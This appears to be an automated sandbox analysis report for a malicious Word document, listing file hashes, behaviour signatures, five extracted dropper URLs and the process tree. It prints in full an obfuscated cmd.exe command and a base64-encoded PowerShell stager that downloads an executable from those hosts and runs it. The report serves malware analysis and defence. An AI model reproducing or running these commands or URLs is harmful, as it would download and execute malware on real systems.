Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
21-05-2024 14:09
General
-
Target
6390ace810631b6f1e2af1453811ee01_JaffaCakes118.doc
-
Size
77KB
-
MD5
6390ace810631b6f1e2af1453811ee01
-
SHA1
73c195d807ac0295d261ca1e28bbf3651e7f9b54
-
SHA256
ee339ff1295cc89c436d68bc87a3493120d83ee407932ef5b3322d963f1c236f
-
SHA512
eb4d70fac30a168790c4d738f349935fdbe2b030b22d1f5e6f945ebd7b7b12f4f6bd8b096f68291b4982ebd6c84d2b953094d6d126b32c7964ab7cbd9ac9aa89
-
SSDEEP
1536:IptJlmrJpmxlRw99NBZ+a5VuB2DZrVeoBE:Qte2dw99fRuBYZrom
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://arkanddove.com/7Ts
exe.dropper
http://bearinmindstrategies.com/JZ2d
exe.dropper
http://bluemoonweather.org/tcp
exe.dropper
http://boczon.pl/Z
exe.dropper
http://antallez.com/Ct
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6390ace810631b6f1e2af1453811ee01_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\Cmd.exeCmd /V^:/C"^se^t P^Y==^=^A^A^g^A^A^I^AACA^gA^A^I^A^AC^A^g^AAIA^AC^AgA^A^IA^AC^A^gA^A^I^A^ACA^g^A^A^I^A^0^H^A9^Bw^e^Ag^GAjBAd^AEGA^jBQ^fAs^D^ArBQ^YA^U^G^A^y^B^g^Y^As^DA6B^w^aAw^G^AkA^A^IA0^GA^lB^A^d^AkEA^tAQZ^A^s^G^Av^Bg^d^A^4^GA^J^Bw^O^AkC^A6B^w^aAwG^A^k^A^A^IAwC^ABB^A^aA^U^EAk^A^A^K^AUGAs^BQ^aAYEA^kBQ^Y^A^8GA^s^BgbAcHAv^BARA^4CA6B^AV^AE^HAkA^w^eAkHAyB^A^dAsH^A^p^A^wcAo^HAhB^AJA^AC^Au^B^QaAAC^A^B^BAa^A^UE^A^kA^AK^A^g^G^AjBQ^YAU^G^AyB^w^bAYG^A7AwJ^A^U^G^A^4^BQZ^A^4CAn^A^wK^A^gFAPBAU^A^QCArAw^JAwF^An^Aw^KA^MG^A^pB^Ab^AI^GA^1B^AcA^oD^A^2^Bg^b^AU^GAkAQP^Ao^H^Ar^B^A^bAQCA^7A^w^J^A^Y^DA4^A^gN^AcC^A^gA^QP^A^AC^AYB^w^T^AA^FA^k^AwOAkC^An^A^AQ^AcCAo^A^A^dA^kG^A^s^BAcAMF^AuA^wJ^AQHA^D^BwLA^0^G^AvBw^YA^4C^A^6^B^QZ^AwG^AsBQ^YA^QHAu^B^QYA8C^AvAg^OAAHA0B^Ad^Ag^G^A^A^B^g^WA^8C^As^B^AcA4C^Au^B^wbAo^H^AjB^wbAIGAvA^wL^A^oD^A^w^BA^dA^Q^H^AoBAQ^A^A^H^A^j^B^A^d^A8C^AnB^gcA^8^GA^uA^gc^AU^G^A^oBAdA^EGA^l^B^wdA^4^GAvB^wbA0^GA^l^B^QdAw^G^A^i^B^wLA8CA6A^Ac^A^Q^HA0BAa^AA^EA^kBg^MAoFA^KB^wLA0^G^AvB^w^Y^A^4C^Az^BQZ^AkGAn^B^Q^ZA^Q^H^A^hBgc^A^Q^HAz^B^A^ZA^4GA^pBQ^b^A4^GAp^B^gc^A^E^G^A^l^B^g^Y^A8CAv^Ag^O^AAH^A^0BA^dAgG^AAB^wc^A^QFA3^AwL^A^0^GAvB^w^Y^A4CA^lBgd^A^8^GA^k^BA^Z^A4^G^A^h^BwaA^IHAhBwLA8CA^6A^AcA^Q^HA^0^BAaAcCA9A^wcAo^HAh^B^AJ^As^D^A^0^Bg^bA^UG^ApBA^b^A^M^E^AiBQ^Z^AcF^AuA^A^dAU^GAOBAI^AQHA^jB^Q^ZA^o^GAi^B^w^bA^0C^A^3B^QZA4GA^9^A^ge^AQFAx^BA^J e^- lle^h^sr^e^w^o^p&&^f^or /^L %^u ^in (^90^9^,-^1^,^0)^d^o s^e^t ^2^uf^3=!^2^uf^3!!P^Y:~%^u,1!&&^if %^u==^0 c^al^l %^2^uf^3:^~^6%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABxAFQAegA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABhAHoAcwA9ACcAaAB0AHQAcAA6AC8ALwBhAHIAawBhAG4AZABkAG8AdgBlAC4AYwBvAG0ALwA3AFQAcwBAAGgAdAB0AHAAOgAvAC8AYgBlAGEAcgBpAG4AbQBpAG4AZABzAHQAcgBhAHQAZQBnAGkAZQBzAC4AYwBvAG0ALwBKAFoAMgBkAEAAaAB0AHQAcAA6AC8ALwBiAGwAdQBlAG0AbwBvAG4AdwBlAGEAdABoAGUAcgAuAG8AcgBnAC8AdABjAHAAQABoAHQAdABwADoALwAvAGIAbwBjAHoAbwBuAC4AcABsAC8AWgBAAGgAdAB0AHAAOgAvAC8AYQBuAHQAYQBsAGwAZQB6AC4AYwBvAG0ALwBDAHQAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAATwBYACAAPQAgACcANgA4ADYAJwA7ACQAbABrAHoAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUABPAFgAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAaABBACAAaQBuACAAJABhAHoAcwApAHsAdAByAHkAewAkAHEAVAB6AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAaABBACwAIAAkAGwAawB6ACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAGwAawB6ADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5d23fe31f384b0e56bf433c5ab1cfe4ed
SHA1d95ca5cc88ce1c40f1ed9b38489afb88b0c666eb
SHA2564b680a4678aa9de71a5e3451ddf9b53a0a03cc66a8297f358de52f602f142136
SHA51222683f9c2eadb23556895950a4772332b6d4a96f902f38ae9b3b0aaa7d2ed0026298a2c97ffb3fbfb14e19a8de6832cc8604494c38cf6f8a131ff7c399ddcba9
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
1024KB